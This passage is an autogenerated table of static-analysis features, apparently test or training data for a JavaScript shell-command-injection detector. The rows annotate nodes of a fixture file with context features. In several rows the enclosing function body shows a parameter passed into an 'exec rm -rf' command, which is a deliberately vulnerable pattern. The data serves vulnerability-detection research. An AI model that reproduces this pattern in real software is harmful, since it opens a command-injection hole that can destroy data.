name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:33 | cp = re ... ocess") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:16 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:16 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:33 | exceptional return of require ... ocess") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:33 | require ... ocess") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:33 | require ... ocess") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:18:1:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:18:1:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:18:1:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:18:1:32 | "child_process" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:18:1:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:18:1:32 | "child_process" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:1:3:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:1:3:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:1:3:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:1:3:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:1:3:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:1:3:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:1:8:1 | module. ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:1:8:1 | module. ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:1:8:1 | module. ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:8:3:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:8:3:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:8:3:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | this | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | this | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:3:17 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | 'arguments' object of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | exceptional return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | functio ... // OK\\n} | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | functio ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | functio ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:18:8:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile name name cp execFile name name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:3:28:3:31 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path 